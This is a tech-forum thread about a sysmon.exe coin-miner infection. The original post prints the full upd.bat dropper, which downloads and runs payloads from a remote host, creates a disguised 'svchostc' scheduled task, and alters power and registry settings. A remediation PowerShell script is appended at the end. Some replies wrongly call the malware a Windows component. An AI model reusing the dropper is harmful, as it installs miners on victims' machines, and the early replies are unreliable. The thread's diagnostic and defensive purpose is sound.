
Weird process using 50% of my cpu

Solved by ciprian97pop

Hello everyone

Today I noticed a weird process showing up in task manager, that's constantly consuming 45-50% of my cpu all the time

The process is called sysmon.exe and I've been aware of it since a few hours ago.

Every time I kill the process it comes back.

It also creates the .exe in the appdata/temp folder.

I've searched online but I found almost nothing about it.

Also, I'm in the process of downloading an antivirus (I used Windows Defender because I don't download or use suspicious stuff).

I also thought that it might be some sort of coin miner but it wasn't using any internet

Here's a screenshot of it:

[screenshot attachment: task manager]

 

Also, here's the path to the file

[screenshot attachment: file path]

 

UPDATE:

After some more digging, I found out that every time it creates a temp_XXXX folder (where XXXX are random numbers) and in that folder it also creates 3 .bat files

[screenshot attachment: temp folder contents]

The start.bat file is just running the build.bat file, but here's what I found when I opened the build.bat file

[screenshot attachment: build.bat]

 

At this point I'm 99% sure that this is some kind of coin miner/malware

Here comes the fun part

This is what i found when I opened the upd.bat file

<spoiler>

ping www.google.com -n 1 -w 1000
if %errorlevel% == 1 ( exit )
if not exist "%TEMP%\7za.exe" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/7za.exe -OutFile \"%TEMP%\7za.exe\""
)
if not exist "%TEMP%\ppuarchive4.zip" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31 fg1x2. org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\""
)
if not exist "%TEMP%\bcmuarchive12.zip" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\""
)
if not exist "%TEMP%\tmg.ps1" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\""
)
if not exist "%TEMP%\opokl.txt" (
    PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2 .o rg/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\""
    PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\""
    schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F
    del "%TEMP%\svctask.xml"
    echo a > "%TEMP%\opokl.txt"
)
if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f  g1x2. o rg/batch bot.vbs -OutFile \"%TEMP%\batchbot.vbs\""
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg 1x2.or g/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\""
    PowerShell -Command "Invok e-WebRequest -Uri http://31b4bd 31fg1x2.o rg/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\""
    "%TEMP%\batchinstaller.bat" 
)
set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1
(for %%a in (%list%) do ( 
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90
))
powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f
if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" (
    "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y
    "%~dp0\packagenew\buildpassive.bat"
    echo d > "%LOCALAPPDATA%\svc10.17134\d.txt"
    rmdir /s /q "%~dp0\packagenew"
)
taskkill /f /im sysmon.exe
::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL
::if "%ERRORLEVEL%"=="0" exit
"%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y
"%~dp0\packagehwloc\start.bat"
start /b "" cmd /c del "%~dp0\upd.bat"&exit /b

 

</spoiler>

 

Yeah, so it surely is a virus or some sort of malware

Could someone explain to me what that code does? It would help a lot

Also, any suggestions would be greatly appreciated.

 

Thank you

AMD Athlon X4 750k; Gigabyte F2A88XM-DS2; 8Gb Corsair XMS 1600 Mhz; AMD Hd5670 1Gb DDR3; Bequiet E6-600W; W7 Ultimate x64

#KILLEDMYWIFE                                                                                                                                                                                                                         so miner; very doge; much value   

Dell Vostro 5470: i5 4200U Nvidia GT740m 2Gb 14" 1366x768 Kingston V300 120Gb                                                                                              


NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

 


1 minute ago, Enderman said:

It's part of Windows.

that... really makes me not want to use windows 10 lol


2 minutes ago, Enderman said:

Are you sure? 

 

Why would it need to consume that much CPU if it's just some event monitor?

I also read that article but didn't think much of it.


Just now, emosun said:

that... really makes me not want to use windows 10 lol

It's literally a part of the security to prevent malware...

If it's using 50% CPU then there's some problem with the OS.

Usually in cases like these you can leave it for a few hours until it finishes whatever it's doing and then goes back to 0%, but sometimes stuff gets stuck if you try forcing it to terminate or other reasons.


It's a system process but a little more Jamaican

muh specs 

Gaming and HTPC (reparations)- ASUS 1080, MSI X99A SLI Plus, 5820k- 4.5GHz @ 1.25v, asetek based 360mm AIO, RM 1000x, 16GB memory, 750D with front USB 2.0 replaced with 3.0  ports, 2 250GB 850 EVOs in Raid 0 (why not, only has games on it), some hard drives

Screens- Acer preditor XB241H (1080p, 144Hz Gsync), LG 1080p ultrawide, (all mounted) directly wired to TV in other room

Stuff- k70 with reds, steel series rival, g13, full desk covering mouse mat

All parts black

Workstation(desk)- 3770k, 970 reference, 16GB of some crucial memory, a motherboard of some kind I don't remember, Micomsoft SC-512N1-L/DVI, CM Storm Trooper (It's got a handle, can you handle that?), 240mm Asetek based AIO, Crucial M550 256GB (upgrade soon), some hard drives, disc drives, and hot swap bays

Screens- 3  ASUS VN248H-P IPS 1080p screens mounted on a stand, some old tv on the wall above it. 

Stuff- Epicgear defiant (solderless swappable switches), g600, moutned mic and other stuff. 

Laptop docking area- 2 1440p korean monitors mounted, one AHVA matte, one samsung PLS gloss (very annoying, yes). Trashy Razer blackwidow chroma...I mean like the J key doesn't click anymore. I got a model M i use on it to, but its time for a new keyboard. Some edgy Utechsmart mouse similar to g600. Hooked to laptop dock for both of my dell precision laptops. (not only docking area)

Shelf- i7-2600 non-k (has vt-d), 380t, some ASUS sandy itx board, intel quad nic. Currently hosts shared files, setting up as pfsense box in VM. Also acts as spare gaming PC with a 580 or whatever someone brings. Hooked into laptop dock area via usb switch


Thank you guys for your replies

I will stop killing the process and let it run hoping it will disappear soon.

Just hoping that i won't have the surprise of turning on my laptop tomorrow morning and finding everything encrypted

 

P.S.: Making a backup on google drive with my most important files just to be safe


2 minutes ago, Enderman said:

If it's using 50% CPU then there's some problem with the OS.

I agree. So.... makes me not want to use Windows 10 lol

Honestly I have never seen a system process use 50% of my CPU power ever, I can't imagine what needs PROCESSING that much for just OS maintenance. I understand maybe the drive being busy moving files around or possibly the network downloading an update, but the CPU? Is it folding proteins or something? lol


Just now, emosun said:

I agree. So.... makes me not want to use Windows 10 lol

Honestly I have never seen a system process use 50% of my CPU power ever, I can't imagine what needs PROCESSING that much for just OS maintenance. I understand maybe the drive being busy moving files around or possibly the network downloading an update, but the CPU? Is it folding proteins or something? lol

Background updates often take 50-100% CPU, there are plenty of things the OS does in the background, everything from OS changes, drivers, security scans, etc.

Maybe it's time for OP to do a clean install if it isn't going away on its own or with restarts.


1 minute ago, Enderman said:

Background updates often take 50-100% CPU

wow that would really drive me nuts. lol

Again, I'm not sure what would take that much CPU power. I can't help but feel they are just sneaking CPU usage in there to mine coins or something. I feel like if your CPU is spending 100% of its power just trying to stay safe it almost negates having a computer. lol, a discussion for another time.


Just now, emosun said:

wow that would really drive me nuts. lol

Again, I'm not sure what would take that much CPU power. I can't help but feel they are just sneaking CPU usage in there to mine coins or something. I feel like if your CPU is spending 100% of its power just trying to stay safe it almost negates having a computer. lol, a discussion for another time.

Usually it only lasts a few minutes or seconds though...


10 hours ago, Syntaxvgm said:

It's a system process but a little more Jamaican

 

10 hours ago, Enderman said:

It's literally a part of the security to prevent malware...

If it's using 50% CPU then there's some problem with the OS.

Usually in cases like these you can leave it for a few hours until it finishes whatever it's doing and then goes back to 0%, but sometimes stuff gets stuck if you try forcing it to terminate or other reasons.

 

10 hours ago, emosun said:

that... really makes me not want to use windows 10 lol

Hi again

 

So... yeah..

Today I installed Malwarebytes and let's just say that that wasn't a Windows event reporter

[screenshot attachment: Malwarebytes detection]

 

Again, thank you guys for your involvement 


it was sitting in the temp folder so yeah definitely not a real system process.


9 hours ago, ciprian97pop said:

 

Again, thank you guys for your involvement 

Huh wow...

And it's gone now?


3 hours ago, Enderman said:

Huh wow...

And it's gone now?

Yep.

Malwarebytes got rid of it

I will keep doing some daily scans until next week just to be sure


4 minutes ago, ciprian97pop said:

Yep.

Malwarebytes got rid of it

I will keep doing some daily scans until next week just to be sure

How did you even manage to get malware that bad...


13 hours ago, Enderman said:

How did you even manage to get malware that bad...

I... I really don't know.

It's more embarrassing as I work as a system administrator and I should be the one stopping things like this from happening.

If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in windows so I used testdisk to recover some files. Maybe that was the moment in which I got that


8 hours ago, ciprian97pop said:

I... I really don't know.

It's more embarrassing as I work as a system administrator and I should be the one stopping things like this from happening.

If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in windows so I used testdisk to recover some files. Maybe that was the moment in which I got that

Welp, we both learnt something new today...


  • 3 weeks later...

I had the same trouble. Sysmon.exe using 50-60% of the processor. It came with Visual Studio.

 

Here's what I did to get rid of it:

 

  1. End Task the Sysmon.exe from the Task Manager (Didn't work, it pops up after some time and downloads loads of files in TEMP.)
  2. Delete the files from the temp folder of Sysmon.exe (Didn't work, pops up after some time again.)
  3. By this time deleting files and searching on sites (no answer anywhere).
  4. Thought there must be some process running in the background that does this. (Download Process Monitor and log the folder temp)
  5. Found the culprit.
  6. Here is the answer (Links to Superuser).

//SOLVED

If you don't want to visit Superuser.

 

The problem is with the secret process running. Go to details of task manager. And look for svchostc.exe not svchost.exe (notice extra 'c'?). Yeah, this process downloaded the bat file and started the whole mess. Go to its original location, delete it - end the process and DONE. Also, clean up the registry and delete the files from %temp% folder.

 

[screenshot attachments: Task Manager details showing svchostc.exe, and its file location]
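The indicators visible in the upd.bat the OP posted (the "svchostc" scheduled task, the files dropped into %TEMP% and %LOCALAPPDATA%, the TdrDelay registry value, the power-plan changes) together with the svchostc.exe process named in the answer above can be checked in one pass from an elevated PowerShell prompt. The script below is an added example written for this thread; it is not code from the forum, the posters or any product. It assumes an English-language Windows build (the powercfg text it parses is localized), that the dropped files keep the exact names and folders shown in upd.bat, and that the working folders are the temp_XXXX directories under %TEMP% the OP described. Without -Remediate it only reports what it finds.

```powershell
<#
  Added triage script for the sysmon.exe / svchostc.exe miner described in this thread.
  Not from the thread itself. Run elevated. Read-only unless -Remediate is given.
  Assumptions: English Windows (powercfg output parsing), file names as in upd.bat.
#>
[CmdletBinding()]
param(
    [switch]$Remediate
)

$findings = New-Object System.Collections.Generic.List[string]

# 1. Processes: the miner the OP saw (sysmon.exe) and the loader named to look like
#    svchost.exe (svchostc.exe, note the extra 'c'). Only binaries that run from the
#    user's temp / local-appdata trees are ever deleted: a genuine Sysinternals Sysmon
#    install runs from C:\Windows and must be left alone.
$suspectNames = 'svchostc', 'sysmon'
$procs = Get-Process -Name $suspectNames -ErrorAction SilentlyContinue
foreach ($p in $procs) {
    $path = '<unknown>'
    try { if ($p.Path) { $path = $p.Path } } catch { }
    $findings.Add("process $($p.ProcessName) (PID $($p.Id)) running from $path")
    if ($Remediate) {
        Stop-Process -Id $p.Id -Force -ErrorAction SilentlyContinue
        $userTree = ($path -like "$env:LOCALAPPDATA\*") -or ($path -like "$env:TEMP\*")
        if ($userTree) { Remove-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue }
    }
}

# 2. The scheduled task upd.bat registers with "schtasks /Create ... /tn svchostc".
#    schtasks.exe is used instead of Get-ScheduledTask so this also works on Windows 7.
& schtasks.exe /Query /TN svchostc 2>&1 | Out-Null
if ($LASTEXITCODE -eq 0) {
    $findings.Add("scheduled task 'svchostc' is registered")
    if ($Remediate) { & schtasks.exe /Delete /TN svchostc /F 2>&1 | Out-Null }
}

# 3. Files and folders upd.bat downloads, creates, or uses as "already installed" markers.
$dropped = @(
    "$env:TEMP\7za.exe",
    "$env:TEMP\ppuarchive4.zip",
    "$env:TEMP\bcmuarchive12.zip",
    "$env:TEMP\tmg.ps1",
    "$env:TEMP\opokl.txt",
    "$env:TEMP\batchbot.vbs",
    "$env:TEMP\batchinstaller.bat",
    "$env:TEMP\batchtask.xml",
    "$env:LOCALAPPDATA\WindowsDefenderTemp",
    "$env:LOCALAPPDATA\svc10.17134"
)
foreach ($item in $dropped) {
    if (Test-Path -LiteralPath $item) {
        $findings.Add("dropped artifact $item")
        if ($Remediate) { Remove-Item -LiteralPath $item -Recurse -Force -ErrorAction SilentlyContinue }
    }
}

# The temp_XXXX working folders (start.bat / build.bat / upd.bat) the OP described.
Get-ChildItem -LiteralPath $env:TEMP -Filter 'temp_*' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSIsContainer -and (Test-Path -LiteralPath (Join-Path $_.FullName 'upd.bat')) } |
    ForEach-Object {
        $findings.Add("dropper working folder $($_.FullName)")
        if ($Remediate) { Remove-Item -LiteralPath $_.FullName -Recurse -Force -ErrorAction SilentlyContinue }
    }

# 4. upd.bat writes TdrDelay as REG_SZ "8" (GPU timeout-detection delay); the value is
#    normally absent, so an exact match on "8" is a strong signal on a box that never set it.
$tdrKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\GraphicsDrivers'
$tdr = Get-ItemProperty -Path $tdrKey -Name TdrDelay -ErrorAction SilentlyContinue
if ($tdr -and "$($tdr.TdrDelay)" -eq '8') {
    $findings.Add("TdrDelay=8 set under $tdrKey")
    if ($Remediate) { Remove-ItemProperty -Path $tdrKey -Name TdrDelay -ErrorAction SilentlyContinue }
}

# 5. Power plan: upd.bat sets "Sleep after" (Sleep subgroup 238c9fa8-..., setting 29f6c1db-...)
#    to 0 = never on AC and DC. Reported as informational since users set this legitimately.
$sleepOut = (& powercfg.exe /Query SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 2>&1) -join "`n"
$m = [regex]::Match($sleepOut, 'Current AC Power Setting Index:\s*0x([0-9a-fA-F]+)')
if ($m.Success -and [Convert]::ToInt64($m.Groups[1].Value, 16) -eq 0) {
    $findings.Add("'Sleep after' on AC is 0 (never), as upd.bat sets it; confirm this was intended")
}

if ($findings.Count -eq 0) {
    Write-Output "No indicators from this thread were found."
} else {
    Write-Output ("{0} indicator(s) found:" -f $findings.Count)
    $findings | ForEach-Object { Write-Output "  - $_" }
    if (-not $Remediate) {
        Write-Output "Re-run with -Remediate to stop the processes, delete the task and remove the dropped files."
    }
}
```

The process check is ordered first on purpose: stopping svchostc.exe and sysmon.exe before deleting the task and files prevents the loader from re-downloading them, which is the behaviour the OP hit when killing sysmon.exe alone. The hard-disk and hibernate settings upd.bat also changes (subgroup 0012ee47-... and the other Sleep-subgroup entries) can be reviewed with powercfg /Query in the same way.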
